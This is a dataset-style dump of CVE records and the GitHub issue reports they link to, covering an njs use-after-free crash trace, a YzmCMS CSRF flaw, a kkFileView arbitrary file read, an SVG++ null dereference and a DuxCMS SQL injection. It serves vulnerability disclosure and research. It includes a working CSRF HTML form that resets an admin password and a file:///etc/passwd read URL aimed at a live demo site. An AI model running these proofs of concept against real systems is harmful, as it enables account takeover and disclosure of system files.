(/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x496c97) #1 0x61fa0c in njs_memalign /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_malloc.c:39:11 #2 0x4cf64b in njs_mp_alloc_large /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_mp.c:577:13 #3 0x538fb1 in njs_function_frame_alloc /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:564:17 #4 0x5391a7 in njs_function_lambda_frame /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:466:20 #5 0x4eae4e in njs_function_frame /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.h:154:16 #6 0x4eae4e in njs_function_frame_create /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:1737:16 #7 0x4e310d in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:734:23 #8 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #9 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #10 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #11 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #12 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #13 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #14 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #15 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #16 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #17 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #18 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #19 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #20 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #21 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #22 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #23 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #24 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #25 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #26 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #27 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 #28 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23 #29 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11 #30 0x604d74 in njs_async_function_frame_invoke /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_async.c:34:11 SUMMARY: AddressSanitizer: heap-use-after-free (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x49595e) in __asan_memset Shadow bytes around the buggy address: 0x0c4a8002cb30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cb40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cb50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cb60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cb70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c4a8002cb80: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd 0x0c4a8002cb90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cba0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cbb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cbc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c4a8002cbd0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==465349==ABORTING ``` ## Credit P1umer, afang5472, Kotori of NeSE@IIE
Heap UAF in njs_await_fulfilled
https://api.github.com/repos/nginx/njs/issues/451/comments
3
2021-12-24T06:48:19Z
2022-03-23T04:33:21Z
https://github.com/nginx/njs/issues/451
1,088,190,381
451
3,205
CVE-2022-23384
2022-02-15T13:15:07.680
YzmCMS v6.3 is affected by Cross Site Request Forgery (CSRF) in /admin.add
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/58" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "33CDD39A-96DC-4CF3-9CFF-694DF09B47BB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/yzmcms/yzmcms/issues/58
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
After the administrator logged in, open the following one page admin,add. http://local:8080/yzmcms-v6.3/admin/ / <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://169.254.238.255/yzmcms-v6.3/yzmcms-v6.3/admin/admin_manage/edit.html" method="POST"> <input type="hidden" name="password" value="456456" /> <input type="hidden" name="password2" value="456456" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="realname" value="" /> <input type="hidden" name="nickname" value="" /> <input type="hidden" name="roleid" value="3" /> <input type="hidden" name="dosubmit" value="1" /> <input type="hidden" name="adminid" value="3" /> <input type="hidden" name="yzm&#95;csrf&#95;token" value="8RkhXBf8" /> <input type="submit" value="Submit request" /> </form> </body> </html>
There is one CSRF vulnerability that can add the administrator account
https://api.github.com/repos/yzmcms/yzmcms/issues/58/comments
1
2022-01-16T14:50:07Z
2022-02-14T02:54:19Z
https://github.com/yzmcms/yzmcms/issues/58
1,105,072,186
58
3,206
CVE-2021-43734
2022-02-15T14:15:08.010
kkFileview v4.0.0 has arbitrary file read through a directory traversal vulnerability which may lead to sensitive file leak on related host.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/304" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kekingcn/kkFileView/issues/304" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "14029A50-34F9-451F-800A-5A21EE2822A0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/kekingcn/kkFileView/issues/304
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kekingcn", "kkFileView" ]
### kkFileView arbitrary file read vulnerability **问题描述Description** 最近在公司内部渗透测试中发现某处引用的kkFileView 4.0.0存在任意文件读取漏洞,可通过漏洞读取主机任意文件,易造成敏感信息泄漏。 kkFileview v4.0.0 has arbitrary file read vulnerability which may lead to sensitive file leak on related host。 **漏洞位置vulerable code location** ``kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java``文件103行,urlPath参数支持file协议 The vulnerable code is located at line 103 in ``kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java``. The value which passed through param `urlPath` supports file protocol. ```java /** * 根据url获取文件内容 * 当pdfjs读取存在跨域问题的文件时将通过此接口读取 * * @param urlPath url * @param response response */ @RequestMapping(value = "/getCorsFile", method = RequestMethod.GET) public void getCorsFile(String urlPath, HttpServletResponse response) { logger.info("下载跨域pdf文件url:{}", urlPath); try { URL url = WebUtils.normalizedURL(urlPath); byte[] bytes = NetUtil.downloadBytes(url.toString()); IOUtils.write(bytes, response.getOutputStream()); } catch (IOException | GalimatiasParseException e) { logger.error("下载跨域pdf文件异常,url:{}", urlPath, e); } } ``` #### 漏洞证明PoC 官方演示站点为最新4.0.0版本,以此为演示,访问漏洞位置https://file.keking.cn/getCorsFile?urlPath=file:///etc/passwd 可得 The version of official demo site is v4.0.0. Visit https://file.keking.cn/getCorsFile?urlPath=file:///etc/passwd and the concept is proofed.
arbitrary file read vulnerability
https://api.github.com/repos/kekingcn/kkFileView/issues/304/comments
6
2021-11-14T13:08:01Z
2025-03-17T01:26:08Z
https://github.com/kekingcn/kkFileView/issues/304
1,052,935,438
304
3,207
CVE-2021-44960
2022-02-15T16:15:08.460
In SVGPP SVG++ library 1.3.0, the XMLDocument::getRoot function in the renderDocument function handled the XMLDocument object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the renderDocument function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/svgpp/svgpp/issues/101" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svgpp/svgpp/issues/101.aa" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/svgpp/svgpp/issues/101" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svgpp/svgpp/issues/101.aa" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00001.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:svgpp:svgpp:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "0191EAF3-1028-4C2E-8FA3-7A0D21F3FB3B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/svgpp/svgpp/issues/101
[ "Exploit", "Issue Tracking" ]
github.com
[ "svgpp", "svgpp" ]
[id_000015,sig_11,src_001176,time_147681735,op_arith8,pos_10,val_+3.zip](https://github.com/svgpp/svgpp/files/7662107/id_000015.sig_11.src_001176.time_147681735.op_arith8.pos_10.val_%2B3.zip) 在renderDocument函数中的XMLDocument::getRoot函数对XMLDocument对象处理不当,在第二个if处提前返回一个空指针,造成renderDocument函数后面有空指针引用。 The XMLDocument::getRoot function in the renderDocument function handled the XMLDocument object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the renderDocument function. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1486083==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006d742e bp 0x7fffc6d83dd0 sp 0x7fffc6d83880 T0) ==1486083==The signal is caused by a READ memory access. ==1486083==Hint: address points to the zero page. #0 0x6d742e in rapidxml_ns::xml_base<char>::local_name() const /home/zero/Desktop/svgpp-master/src/demo/render/../../../third_party/rapidxml_ns/rapidxml_ns.hpp:882:20 #1 0x6d742e in svgpp::policy::xml::element_iterator<rapidxml_ns::xml_node<char> const*>::get_local_name(rapidxml_ns::xml_node<char> const*) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/policy/xml/rapidxml_ns.hpp:127:43 #2 0x6d742e in bool svgpp::document_traversal<svgpp::context_factories<child_context_factories>, svgpp::length_policy<svgpp::policy::length::forward_to_method<Canvas, svgpp::factory::length::unitless<double, double, svgpp::tag::length_units::mm> const> >, svgpp::color_factory<svgpp::factory::color::percentage_adapter<color_factory_base_t> >, svgpp::processed_elements<processed_elements>, svgpp::processed_attributes<processed_attributes>, svgpp::path_policy<path_policy>, svgpp::document_traversal_control_policy<DocumentTraversalControl>, svgpp::transform_events_policy<svgpp::policy::transform_events::forward_to_method<Transformable> >, svgpp::path_events_policy<svgpp::policy::path_events::forward_to_method<Path> >, svgpp::error_policy<svgpp::policy::error::default_policy<Stylable> >, svgpp::markers_policy<svgpp::policy::markers::calculate_always>, svgpp::attribute_traversal_policy<attribute_traversal>, svgpp::viewport_policy<svgpp::policy::viewport::as_transform> >::load_expected_element<rapidxml_ns::xml_node<char> const*, Canvas, svgpp::tag::element::svg>(rapidxml_ns::xml_node<char> const* const&, Canvas&, svgpp::tag::element::svg) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/document_traversal.hpp:108:61 #3 0x6d742e in bool svgpp::document_traversal<svgpp::context_factories<child_context_factories>, svgpp::length_policy<svgpp::policy::length::forward_to_method<Canvas, svgpp::factory::length::unitless<double, double, svgpp::tag::length_units::mm> const> >, svgpp::color_factory<svgpp::factory::color::percentage_adapter<color_factory_base_t> >, svgpp::processed_elements<processed_elements>, svgpp::processed_attributes<processed_attributes>, svgpp::path_policy<path_policy>, svgpp::document_traversal_control_policy<DocumentTraversalControl>, svgpp::transform_events_policy<svgpp::policy::transform_events::forward_to_method<Transformable> >, svgpp::path_events_policy<svgpp::policy::path_events::forward_to_method<Path> >, svgpp::error_policy<svgpp::policy::error::default_policy<Stylable> >, svgpp::markers_policy<svgpp::policy::markers::calculate_always>, svgpp::attribute_traversal_policy<attribute_traversal>, svgpp::viewport_policy<svgpp::policy::viewport::as_transform> >::load_document<rapidxml_ns::xml_node<char> const*, Canvas>(rapidxml_ns::xml_node<char> const* const&, Canvas&) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/document_traversal.hpp:97:12 #4 0x6d742e in renderDocument(XMLDocument&, ImageBuffer&) /home/zero/Desktop/svgpp-master/src/demo/render/svgpp_render.cpp:1659:3 #5 0x6d8b32 in main /home/zero/Desktop/svgpp-master/src/demo/render/svgpp_render.cpp:1683:7 #6 0x7fb2c6bd3d09 in __libc_start_main csu/../csu/libc-start.c:308:16 #7 0x606bc9 in _start (/home/zero/Desktop/svgpp-master/src/source/bin/svgpp_agg_render+0x606bc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/zero/Desktop/svgpp-master/src/demo/render/../../../third_party/rapidxml_ns/rapidxml_ns.hpp:882:20 in rapidxml_ns::xml_base<char>::local_name() const ==1486083==ABORTING credit:Cvjark,上帝的玩具
New vulnerability
https://api.github.com/repos/svgpp/svgpp/issues/101/comments
6
2021-12-06T16:55:10Z
2022-10-01T08:59:21Z
https://github.com/svgpp/svgpp/issues/101
1,072,374,276
101
3,208
CVE-2021-44960
2022-02-15T16:15:08.460
In SVGPP SVG++ library 1.3.0, the XMLDocument::getRoot function in the renderDocument function handled the XMLDocument object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the renderDocument function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/svgpp/svgpp/issues/101" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svgpp/svgpp/issues/101.aa" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/svgpp/svgpp/issues/101" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svgpp/svgpp/issues/101.aa" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/04/msg00001.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:svgpp:svgpp:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "0191EAF3-1028-4C2E-8FA3-7A0D21F3FB3B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/svgpp/svgpp/issues/101.aa
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "svgpp", "svgpp" ]
[id_000015,sig_11,src_001176,time_147681735,op_arith8,pos_10,val_+3.zip](https://github.com/svgpp/svgpp/files/7662107/id_000015.sig_11.src_001176.time_147681735.op_arith8.pos_10.val_%2B3.zip) 在renderDocument函数中的XMLDocument::getRoot函数对XMLDocument对象处理不当,在第二个if处提前返回一个空指针,造成renderDocument函数后面有空指针引用。 The XMLDocument::getRoot function in the renderDocument function handled the XMLDocument object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the renderDocument function. AddressSanitizer:DEADLYSIGNAL ================================================================= ==1486083==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006d742e bp 0x7fffc6d83dd0 sp 0x7fffc6d83880 T0) ==1486083==The signal is caused by a READ memory access. ==1486083==Hint: address points to the zero page. #0 0x6d742e in rapidxml_ns::xml_base<char>::local_name() const /home/zero/Desktop/svgpp-master/src/demo/render/../../../third_party/rapidxml_ns/rapidxml_ns.hpp:882:20 #1 0x6d742e in svgpp::policy::xml::element_iterator<rapidxml_ns::xml_node<char> const*>::get_local_name(rapidxml_ns::xml_node<char> const*) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/policy/xml/rapidxml_ns.hpp:127:43 #2 0x6d742e in bool svgpp::document_traversal<svgpp::context_factories<child_context_factories>, svgpp::length_policy<svgpp::policy::length::forward_to_method<Canvas, svgpp::factory::length::unitless<double, double, svgpp::tag::length_units::mm> const> >, svgpp::color_factory<svgpp::factory::color::percentage_adapter<color_factory_base_t> >, svgpp::processed_elements<processed_elements>, svgpp::processed_attributes<processed_attributes>, svgpp::path_policy<path_policy>, svgpp::document_traversal_control_policy<DocumentTraversalControl>, svgpp::transform_events_policy<svgpp::policy::transform_events::forward_to_method<Transformable> >, svgpp::path_events_policy<svgpp::policy::path_events::forward_to_method<Path> >, svgpp::error_policy<svgpp::policy::error::default_policy<Stylable> >, svgpp::markers_policy<svgpp::policy::markers::calculate_always>, svgpp::attribute_traversal_policy<attribute_traversal>, svgpp::viewport_policy<svgpp::policy::viewport::as_transform> >::load_expected_element<rapidxml_ns::xml_node<char> const*, Canvas, svgpp::tag::element::svg>(rapidxml_ns::xml_node<char> const* const&, Canvas&, svgpp::tag::element::svg) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/document_traversal.hpp:108:61 #3 0x6d742e in bool svgpp::document_traversal<svgpp::context_factories<child_context_factories>, svgpp::length_policy<svgpp::policy::length::forward_to_method<Canvas, svgpp::factory::length::unitless<double, double, svgpp::tag::length_units::mm> const> >, svgpp::color_factory<svgpp::factory::color::percentage_adapter<color_factory_base_t> >, svgpp::processed_elements<processed_elements>, svgpp::processed_attributes<processed_attributes>, svgpp::path_policy<path_policy>, svgpp::document_traversal_control_policy<DocumentTraversalControl>, svgpp::transform_events_policy<svgpp::policy::transform_events::forward_to_method<Transformable> >, svgpp::path_events_policy<svgpp::policy::path_events::forward_to_method<Path> >, svgpp::error_policy<svgpp::policy::error::default_policy<Stylable> >, svgpp::markers_policy<svgpp::policy::markers::calculate_always>, svgpp::attribute_traversal_policy<attribute_traversal>, svgpp::viewport_policy<svgpp::policy::viewport::as_transform> >::load_document<rapidxml_ns::xml_node<char> const*, Canvas>(rapidxml_ns::xml_node<char> const* const&, Canvas&) /home/zero/Desktop/svgpp-master/src/demo/render/../../../include/svgpp/document_traversal.hpp:97:12 #4 0x6d742e in renderDocument(XMLDocument&, ImageBuffer&) /home/zero/Desktop/svgpp-master/src/demo/render/svgpp_render.cpp:1659:3 #5 0x6d8b32 in main /home/zero/Desktop/svgpp-master/src/demo/render/svgpp_render.cpp:1683:7 #6 0x7fb2c6bd3d09 in __libc_start_main csu/../csu/libc-start.c:308:16 #7 0x606bc9 in _start (/home/zero/Desktop/svgpp-master/src/source/bin/svgpp_agg_render+0x606bc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/zero/Desktop/svgpp-master/src/demo/render/../../../third_party/rapidxml_ns/rapidxml_ns.hpp:882:20 in rapidxml_ns::xml_base<char>::local_name() const ==1486083==ABORTING credit:Cvjark,上帝的玩具
New vulnerability
https://api.github.com/repos/svgpp/svgpp/issues/101/comments
6
2021-12-06T16:55:10Z
2022-10-01T08:59:21Z
https://github.com/svgpp/svgpp/issues/101
1,072,374,276
101
3,209
CVE-2021-3242
2022-02-16T20:15:07.373
DuxCMS v3.1.3 was discovered to contain a SQL injection vulnerability via the component s/tools/SendTpl/index?keyword=.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/duxphp/DuxCMS3/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://www.star123.top/2021/01/16/duxcms3-1-3%E5%AE%A1%E8%AE%A1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/duxphp/DuxCMS3/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://www.star123.top/2021/01/16/duxcms3-1-3%E5%AE%A1%E8%AE%A1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:duxcms_project:duxcms:3.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "DD11A8F8-BC93-4DA4-BD56-7868A9B314DE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/duxphp/DuxCMS3/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
